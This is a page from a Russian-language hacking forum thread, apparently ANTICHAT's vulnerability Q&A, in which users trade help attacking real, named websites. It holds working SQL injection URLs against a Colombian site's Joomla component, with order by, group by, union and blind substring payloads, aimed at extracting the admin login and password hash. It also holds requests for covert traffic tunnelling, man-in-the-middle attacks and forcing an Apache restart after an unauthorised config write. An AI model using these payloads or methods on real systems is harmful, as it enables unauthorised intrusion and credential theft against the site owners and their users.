HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2090 из 2438 « Первая < 10901590199020402080 2086 2087 2088 2089 2090 2091 2092 2093 2094 210021402190 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #20891  
Старый 23.06.2012, 18:44
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
С нами: 9078977

Репутация: 34
По умолчанию
cat1vo угловые скобки то выр6жутся
 
Ответить с цитированием

  #20892  
Старый 23.06.2012, 18:49
mironich
Постоянный
Регистрация: 27.02.2011
Сообщений: 733
С нами: 8003126

Репутация: 19


По умолчанию
Цитата:
Сообщение от None  
$interzis = array(";", '"', "", "=", "'", "script", "?php", "%>", "INSERT", "UPDATE", "DROP");
Если ты ее используешь, сожги код и перепиши с использованием htmltospecialchars
 
Ответить с цитированием

  #20893  
Старый 23.06.2012, 18:54
RazyKK
Познающий
Регистрация: 09.02.2009
Сообщений: 70
С нами: 9078977

Репутация: 34
По умолчанию
нет не мой, просто знаю код фильтра на сайте, над xss
 
Ответить с цитированием

  #20894  
Старый 24.06.2012, 06:10
A_n_d_r_e_i
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
С нами: 8784803

Репутация: 257
По умолчанию
http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+and+1=1+or der+by+1--+

в общем дальше я ниxуя не понимаю, помогите с этим, где я допустил ошибку и как вытащить логин и хеш админа
 
Ответить с цитированием

  #20895  
Старый 24.06.2012, 07:59
lucky_dom
Новичок
Регистрация: 02.06.2012
Сообщений: 5
С нами: 7339286

Репутация: 0
По умолчанию
как незаметно для админа сервера тунелировать весь траф. Через прокси или тому подобное.

1.задача проведения атаки человек посередине.

2.как узнать пароль от веб сервера (apach виндовый) локально.
 
Ответить с цитированием

  #20896  
Старый 24.06.2012, 13:16
A_n_d_r_e_i
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
С нами: 8784803

Репутация: 257
По умолчанию
Цитата:
Сообщение от Nightmarе  
Если order+by не прокатывает, то скорее всего прокатит group+by, что в данном случае и произошло, столбцов 12 штук, однако:
http://super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+union+sele ct+1,2,3,4,5,6,7,8,9,10,11,12+--+1
Данный URL лично у меня не грузится.
Да, у меня тоже( С помощью хавиж достал, но только логины

А тут как:

http://www.incornea.com.co/index.php?option=com_wrapper&view=wrapper&Itemid=3

http://loteriadebogota.com/html/index.php?option=com_wrapper&view=wrapper&Itemid=1 5

А по поводу http://super.com.co, попробуйте, может у кого откроется, нужны хеши
 
Ответить с цитированием

  #20897  
Старый 25.06.2012, 08:00
Ereee
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами: 7604246

Репутация: 267


По умолчанию
Цитата:
Сообщение от RazyKK  
можно ли обойти такую xss фильтрацию?
$interzis = array(";", '"', "", "=", "'", "script", "?php", "%>",
"INSERT", "UPDATE", "DROP"
);
$replace = array("");
Прикольно =)

Цитата:
Сообщение от A_n_d_r_e_i  
http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+and+1=1+or der+by+1--+
в общем дальше я ниxуя не понимаю, помогите с этим, где я допустил ошибку и как вытащить логин и хеш админа
Код:
http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+group+by+11#
При union+select сайт зависает. А при union(select(1),2,3,4,5,6,7,8,9,10,11) не зависает, но false. При uniunionon, selselectect так же false. Поэтому:

Код:
http://www.super.com.co/sitio_super/index.php?option=com_artforms&formid=1'+and+substring((select+version()),1,1)=5+and+'1'='1
=)

Цитата:
Сообщение от A_n_d_r_e_i  
Да, у меня тоже( С помощью хавиж достал, но только логины
А что помешало достать пароли?

Цитата:
Сообщение от A_n_d_r_e_i  
http://www.incornea.com.co/index.php?option=com_wrapper&view=wrapper&Itemid=3
http://loteriadebogota.com/html/index.php?option=com_wrapper&view=wrapper&Itemid=1 5
Com_wrapper, даже смотреть не буду
 
Ответить с цитированием

  #20898  
Старый 25.06.2012, 10:00
Sidarovich1975
Новичок
Регистрация: 04.10.2009
Сообщений: 10
С нами: 8738995

Репутация: 1
По умолчанию
Возникла следующая ситуация:

Есть не рут доступ, но httpd.conf доступен на запись.

Как принудительно ребутнуть апач (или перепрочитать конфиги) , если на "service httpd graceful" не хватает прав? может кто сталкивался... грубо говоря нужно заставить его самого перезагрузиться из вне.
 
Ответить с цитированием

  #20899  
Старый 26.06.2012, 00:36
pirat0
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами: 8063606

Репутация: -1
По умолчанию
Код:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /var/www/xxx.ru/www/lib/core.php on line 18
а возможно как то раскрутить или это просто вывод инфы?
 
Ответить с цитированием

  #20900  
Старый 26.06.2012, 00:50
pirat0
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами: 8063606

Репутация: -1
По умолчанию
ну вот допустим http://www.justsims2.ru/

PHPSESSID доставляю ^ и вывод ошибки
 
Ответить с цитированием
Ответ
Страница 2090 из 2438 « Первая < 10901590199020402080 2086 2087 2088 2089 2090 2091 2092 2093 2094 210021402190 > Последняя »



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.